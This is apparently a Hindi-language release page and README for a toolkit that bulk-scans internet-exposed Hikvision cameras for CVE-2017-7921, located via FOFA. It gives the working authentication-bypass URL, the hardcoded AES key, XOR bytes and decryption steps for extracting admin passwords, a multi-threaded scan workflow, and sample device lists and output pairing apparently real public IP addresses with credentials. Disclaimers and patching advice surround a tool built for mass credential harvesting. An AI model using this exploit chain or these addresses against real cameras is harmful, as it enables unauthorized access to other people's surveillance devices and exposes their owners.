अपडेट पर वापस जाएँ
New releaseAug 10, 2026

CVE-2017-7921-Research-Toolkit GUI

FOFA की सहायता से Hikvision के CVE-2017-7921 भेद्यता का तेज़ी से परीक्षण करने के लिए उपयोग किया जाता है, तथा लॉगिन खाता और पासवर्ड प्रदान करता है और json फ़ाइल आउटपुट करता है।

साझा करें

CVE-2017-7921 अनुसंधान टूलकिट

सुरक्षा घोषणा: यह टूल केवल अधिकृत सुरक्षा अनुसंधान और भेद्यता सत्यापन के लिए है

विषय-सूची


⚖️ कानूनी और नैतिक घोषणा

महत्वपूर्ण सूचना: इस टूल का उपयोग करने का अर्थ है कि आप निम्नलिखित शर्तों से सहमत हैं

  • केवल अधिकृत परीक्षण: केवल उन प्रणालियों के लिए जिनके लिए आपके पास स्पष्ट लिखित प्राधिकरण है
  • कानून का पालन: साइबर सुरक्षा कानून और स्थानीय प्रासंगिक कानूनों का कड़ाई से पालन करें
  • जिम्मेदार प्रकटीकरण: भेद्यता मिलने पर आधिकारिक चैनलों के माध्यम से विक्रेता को रिपोर्ट करें
  • शैक्षिक उद्देश्य: इस टूल का उद्देश्य IoT सुरक्षा जागरूकता बढ़ाना है
  • जोखिम स्वयं वहन करें: इस टूल के दुरुपयोग से उत्पन्न कानूनी परिणामों की जिम्मेदारी उपयोगकर्ता की होगी

यह परियोजना GitHub सुरक्षा अनुसंधान नीति और Hikvision सुरक्षा प्रतिक्रिया केंद्र के प्रकटीकरण मानदंडों का पालन करती है।


📖 परियोजना विवरण

Hikvision IP कैमरों में CVE-2017-7921 प्रमाणीकरण बायपास भेद्यता के लिए बल्क डिटेक्शन और सत्यापन टूल, जो कॉन्फ़िगरेशन फ़ाइलों के स्वचालित डिक्रिप्शन और क्रेडेंशियल निष्कर्षण का समर्थन करता है।

डिज़ाइन लक्ष्य

  • सुरक्षा शोधकर्ताओं को बड़े पैमाने पर उपकरणों की सुरक्षा स्थिति का आकलन करने में सहायता करें
  • डिवाइस मालिकों को स्व-निरीक्षण क्षमता प्रदान करें
  • सुधार अनुशंसा रिपोर्ट उत्पन्न करने का समर्थन करें
  • IoT डिवाइस सुरक्षा उन्नयन को बढ़ावा दें

✨ विशेषताएँ

  • ✅ JSON प्रारूप में डिवाइस सूची का बल्क स्कैन
  • ✅ मल्टी-थ्रेडेड समवर्ती जांच (कॉन्फ़िगर करने योग्य थ्रेड गणना)
  • ✅ एन्क्रिप्टेड कॉन्फ़िगरेशन फ़ाइलों का स्वचालित डाउनलोड
  • ✅ वास्तविक समय में डिक्रिप्ट करें और लॉगिन क्रेडेंशियल निकालें
  • ✅ वास्तविक समय में स्कैन प्रगति प्रदर्शन (tqdm)
  • ✅ परिणाम स्वचालित रूप से JSON रिपोर्ट के रूप में सहेजे जाते हैं
  • ✅ बाधित होने के बाद स्कैन जारी रखने का समर्थन

🛠️ स्थापना निर्देश

पर्यावरण आवश्यकताएँ

  • Python 3.7 या उच्चतर संस्करण
  • केवल Linux / macOS समर्थित (Windows पर कुछ सुविधाएँ सीमित हैं)

निर्भरता स्थापना

git clone https://github.com/[你的用户名]/CVE-2017-7921-Research-Toolkit.git
cd CVE-2017-7921-Research-Toolkit
pip install -r requirements.txt

requirements.txt सामग्री

requests>=2.28.0
pycryptodome>=3.15.0
tqdm>=4.64.0

📊 उपयोग विधि

1. डिवाइस डेटा फ़ाइल तैयार करें

टूल निर्देशिका में zc/ फ़ोल्डर बनाएं, डिवाइस सूची को JSON प्रारूप में रखें (प्रत्येक पंक्ति में एक डिवाइस ऑब्जेक्ट):

mkdir zc

फ़ाइल उदाहरण: devices_2025.json

{"city":"Lisbon","country":"PT","host":"109.50.152.186","link":"http://109.50.152.186:80"}
{"city":"Sao Paulo","country":"BR","host":"200.201.192.75","link":"http://200.201.192.75:8080"}

फ़ील्ड विवरण:

फ़ील्डविवरणआवश्यक
linkडिवाइस HTTP/HTTPS एक्सेस पता✅ हाँ
cityशहर की जानकारी❌ नहीं
countryदेश कोड❌ नहीं
orgसंगठन/ISP जानकारी❌ नहीं

2. स्कैन टूल चलाएं

python batch_decrypt.py

3. इंटरैक्टिव संचालन उदाहरण

════════════════════════════════════════════════════════════════════════════════
Hikvision कैमरा कॉन्फ़िगरेशन फ़ाइल भेद्यता बल्क स्कैन टूल
════════════════════════════════════════════════════════════════════════════════

उपलब्ध JSON फ़ाइलें:
════════════════════════════════════════════════════════════════════════════════
1. devices_2025.json (45,678 बाइट्स)
════════════════════════════════════════════════════════════════════════════════

कृपया फ़ाइल नंबर चुनें: 1
चयनित फ़ाइल: devices_2025.json
डिवाइस डेटा लोड हो रहा है...

स्कैन किए जाने वाले कुल डिवाइस: 2000
कृपया समवर्ती थ्रेड गणना दर्ज करें (डिफ़ॉल्ट: 5): 10
समवर्ती थ्रेड गणना: 10
स्कैन प्रारंभ...

कुल स्कैन किए गए डिवाइस: 2000
भेद्य डिवाइसों की संख्या मिली: 127

भेद्य डिवाइस सहेजे गए: vulnerable_devices.json

📁 आउटपुट परिणाम

स्कैन पूर्ण होने पर vulnerable_devices.json उत्पन्न होता है, जिसमें सभी भेद्य डिवाइसों की जानकारी होती है।

उदाहरण आउटपुट:

[
  {
    "url": "http://109.50.152.186",
    "config_url": "http://109.50.152.186/System/configurationFile?auth=YWRtaW46MTEK",
    "username": "admin",
    "password": "123456",
    "city": "Lisbon",
    "country": "PT",
    "org": "ISP Telecom",
    "status": "success"
  }
]

🛡️ सुरक्षा और सुधार सुझाव

डिवाइस मालिकों के लिए

  1. तुरंत फर्मवेयर अपग्रेड करें: नवीनतम संस्करण डाउनलोड करने के लिए Hikvision आधिकारिक वेबसाइट पर जाएं
  2. डिफ़ॉल्ट पासवर्ड बदलें: अपग्रेड करने के बाद भी डिफ़ॉल्ट admin पासवर्ड बदलना चाहिए
  3. नेटवर्क अलगाव: कैमरों को अलग VLAN में तैनात करें, सार्वजनिक नेटवर्क से सीधी पहुँच प्रतिबंधित करें
  4. IP व्हाइटलिस्ट सक्षम करें: केवल विश्वसनीय IP को प्रबंधन इंटरफ़ेस तक पहुँच की अनुमति दें

सुरक्षा पेशेवरों के लिए

  1. स्कैन परिणाम गोपनीय रखें: अनपैच किए गए डिवाइसों की विस्तृत जानकारी लीक न करें
  2. सुधार में सहायता करें: तकनीकी सहायता के लिए डिवाइस मालिकों से सक्रिय रूप से संपर्क करें
  3. अनुपालन रिपोर्ट: ISO 27001 मानक के अनुरूप सुरक्षा मूल्यांकन रिपोर्ट उत्पन्न करें

🔬 तकनीकी विवरण

भेद्यता सिद्धांत

  • प्रमाणीकरण बायपास: /System/configurationFile?auth=YWRtaW46MTEK हार्डकोडेड क्रेडेंशियल का उपयोग करता है
  • कमजोर एन्क्रिप्शन: कॉन्फ़िगरेशन फ़ाइलें निश्चित AES-ECB कुंजी के साथ एन्क्रिप्ट की जाती हैं
  • कुंजी रिसाव: कुंजी 279977f62f6cfd2d91cd75b889ce0c9a फर्मवेयर में हार्डकोडेड है

एन्क्रिप्शन प्रक्रिया

  1. एन्क्रिप्टेड बाइनरी कॉन्फ़िगरेशन फ़ाइल प्राप्त करें
  2. AES-ECB डिक्रिप्शन (पहला ब्लॉक हटाएं)
  3. XOR ऑब्सफस्केशन (कुंजी: 0x73, 0x8B, 0x55, 0x44)
  4. admin खाता और बाद के पासवर्ड फ़ील्ड निकालने के लिए रेगेक्स का उपयोग करें

📝 लाइसेंस

यह सॉफ़्टवेयर केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। उपयोगकर्ताओं को यह सुनिश्चित करना चाहिए कि वे सभी लागू कानूनों का अनुपालन करते हैं।


🙏 आभार

  • Hikvision को समय पर प्रतिक्रिया देने और फर्मवेयर अपडेट जारी करने के लिए धन्यवाद
  • ओपन-सोर्स समुदाय द्वारा प्रदान की गई भेद्यता विश्लेषण सामग्री के लिए धन्यवाद
  • यह परियोजना IoT सुरक्षा अनुसंधान सर्वोत्तम अभ्यास का पालन करती है

अंतिम अपडेट: 2025-01-29 | संस्करण: v1.0.0 | समर्थित CVE: CVE-2017-7921

श्रेणियाँ